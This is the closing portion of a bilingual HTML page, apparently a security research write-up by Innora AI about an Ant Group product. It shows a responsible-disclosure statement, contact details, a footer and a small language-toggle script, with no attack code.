<li>This article does not contain any complete PoC code that could be directly used for attacks (critical parameters are sanitized).</li>
<li>Online demonstration pages are read-only with all data exfiltration functionality disabled.</li>
<li>We honestly labeled the verification status of each finding, including parts where defenses are effective.</li>
<li>All descriptions involving financial operations explicitly note "user manual confirmation still required."</li>
</ul>
</div>
</div>
</section>
</div>
<!-- ==================== CONTACT ==================== -->
<section>
<h2>
<span class="zh">联系我们</span>
<span class="en">Contact</span>
</h2>
<div class="zh">
<p>如果蚂蚁集团在阅读本文后希望进一步沟通、请求澄清或要求更新特定内容,请发送邮件至 <strong>feng@innora.ai</strong>。如果相关问题在后续版本中得到修复,我们将及时更新本文并标注修复状态。</p>
<p>如果其他安全研究人员对本文中的技术分析有疑问或想要交流,同样欢迎联系。</p>
</div>
<div class="en">
<p>If Ant Group wishes to discuss further, request clarification, or ask for specific content updates after reading this article, please email <strong>feng@innora.ai</strong>. If the issues discussed here are addressed in future versions, we will promptly update this article with the fix status.</p>
<p>Other security researchers with questions about the technical analysis or who wish to exchange findings are also welcome to reach out.</p>
</div>
</section>
<!-- ==================== FOOTER ==================== -->
<footer>
<p>&copy; 2026 Innora AI Security Research. All rights reserved.</p>
<p>feng@innora.ai | <a href="https://innora.ai">innora.ai</a></p>
<p style="margin-top: 12px; font-size: 11px; color: #555;">
<span class="zh">本文发布于 2026-03-11。如蚂蚁集团在此之后修复了上述问题我们将更新本文予以说明。</span>
<span class="en">Published 2026-03-11. Last updated: 2026-03-14. If Ant Group addresses the above issues after this date, we will update this article accordingly.</span>
</p>
</footer>
<script>
function setLang(lang) {
document.body.className = lang === 'zh' ? 'lang-zh' : '';
document.getElementById('btn-zh').className = lang === 'zh' ? 'active' : '';
document.getElementById('btn-en').className = lang === 'en' ? 'active' : '';
localStorage.setItem('zfb-lang', lang);
}
// Restore language preference
var saved = localStorage.getItem('zfb-lang');
if (saved === 'zh') setLang('zh');
</script>
</body>
</html>
Reference in New Issue View Git Blame Copy Permalink